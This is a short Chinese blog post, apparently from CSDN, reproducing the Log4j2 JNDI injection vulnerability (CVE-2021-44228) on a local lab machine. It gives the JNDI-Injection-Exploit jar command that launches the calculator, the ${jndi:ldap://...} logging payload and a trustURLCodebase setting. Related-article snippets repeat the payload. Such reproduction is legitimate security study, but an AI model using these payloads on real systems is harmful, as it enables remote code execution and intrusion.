2021-12-10 log4j2 漏洞复现

最新推荐文章于 2023-09-16 14:16:44 发布
最新推荐文章于 2023-09-16 14:16:44 发布
阅读量4.3k 收藏 3
点赞数
文章标签: java intellij-idea 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35745341/article/details/121865426
版权

log4j2 漏洞复现
https://github.com/welk1n/JNDI-Injection-Exploit
1、运行该github项目(用idea运行ServerStart的main方法或运行jar包,jar包上面github地址有提供)
注意windows与mac的不同 ,jdk1.8及以下
运行jar包命令:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "C:\Windows\System32\calc.exe" -A "127.0.0.1"

若是通过idea运行注意替换命令
运行之后会生成url ,url示例:ldap://192.168.88.1:1389/k5vyxp
2、运行带log4j2的项目 log.error(url),运行成功后会打开你的计算器
System.setProperty(“com.sun.jndi.ldap.object.trustURLCodebase”,“true”);
log.error("${jndi:ldap://192.168.88.1:1389/k5vyxp}")

白开水233
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
spring-boot-starter-log4j2
09-25
此资源包含spring-boot-starter-log4j2日志框架所需的jar包及版本,童叟无欺,真实有效,放心下载
log4j2漏洞详解
wanan的博客
01-24 204
log4j2漏洞详解
log4j漏洞原理和靶场复现
Aiwin的博客
08-19 7368
log4j漏洞原理和靶场复现
Log4j2漏洞复现
weixin_51519028的博客
08-12 1万+
Apache Log4j2是 Apache软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。202112 月 9 日晚,Log4j2 的一个远程代码执行漏洞的利用细节被公开。攻击者使用${}......
log4j2漏洞复现与利用】
热门推荐
一个程序员
01-31 3万+
log4j2
log4j2漏洞简单复现
BING
06-06 2938
log4j2漏洞简单复现
logging-log4j2-log4j-2.15.0-rc2.zip maven 资源库
12-31
针对Log4j 2 远程代码执行漏洞,需要用到的升级资源包,适用于maven资源库,包括log4j,log4j-core,log4j-api,log4j-1.2-api,log4j-jpa等全套2.15.0 maven资源库jar包。如果是maven本地仓库使用,需要将zip包解压...
log4j-api-2.12.4.ja和log4j-core-2.12.4.jar
04-27
log4j-api-2.12.4.jar和log4j-core-2.12.4.jar,该版本避免log4j漏洞问题。
Log4j漏洞复现
m1287578441的博客
06-08 2908
Log4j漏洞复现
网络安全 log4j漏洞复现
jazzz98的博客
06-19 3625
log4j被爆出“史诗级”漏洞。其危害非常大,影响非常广。该漏洞非常容易利用,可以执行任意代码。这个漏洞的影响可谓是重量级的。
Log4j2 反序列化漏洞原理与复现
FisrtBqy的博客
05-15 2809
Log4j2 RCE漏洞原理与复现
log4j漏洞复现
weixin_68647219的博客
04-20 4443
202112月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
[Java安全]—log4j2 rce复现
Sentiment的博客
07-09 985
漏洞爆出已经半年多了,可当时还是个java啥都不懂的菜鸡所以也没能及时复现,现在捡起来复现下21年席卷整个安全圈的log4j2漏洞log4j 是 javaweb 的日志组件,用来记录 web日志 去指定下载文件的url 在搜索框或者搜索的 url 里面加上${jndi:ldap://127.0.0.1/test} ,log4j 会对这串代码进行表达式解析,给 lookup 传递一个恶意的参数指定,参数指的是比如 ldap 不存在的资源 $ 是会被直接执行的。后面再去指定下载文件的 url,去下载我们的恶意
【渗透测试】log4j漏洞复现漏洞修复方案
最新发布
Yb528970805的博客
09-16 1833
20211210 日凌晨,Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开,由于 Log4j 的广泛使用,该漏洞一旦被攻击者利用会造成严重危害。Apache Log4j 2.x <= 2.14.1 版本均回会受到影响。Log4j 是一款开源 Java 日志记录工具。Log4j 2 是对 Log4j 的重大升级,此次漏洞的出现,正是由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
【网络安全---漏洞复现log4j2漏洞详细的复现和利用过程(CVE-2021-44228)
m0_67844671的博客
09-10 937
Log4j2远程代码执行漏洞复现(cve-2021-44228),漏洞复现详细过程,cve-2021-44228,Log4j2
Log4j复现过程
weixin_50339832的博客
12-26 2348
log4j是一个记录日志的组件,用来对程序状态进行动态记录, logger.info("system propety: ${jndi:schema://url}"); jndi:jndi解析器通过jdk获取内容,反序列化为java对象作为jndi, 并打印,jndi就是这个从外部查找得到的java对象。 schema:获取方式,jdk支持多种不同的查找方式,包括 corbname, dns, iiop, iiopname, ldap, ldaps, rmi 因ldap写法简单,被作为常用的获取方式
apache log4j CVE-2021-44228漏洞怎么解决
06-03
java -Dlog4j2.formatMsgNoLookups=true -Dlog4j2.disable.jmx=true -Dlog4j2.benchMillis=100 org.apache.logging.log4j.core.tools.GenerateExtendedLoggerInfo > log4j2-enum-class-loader.policy ``` 然后将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值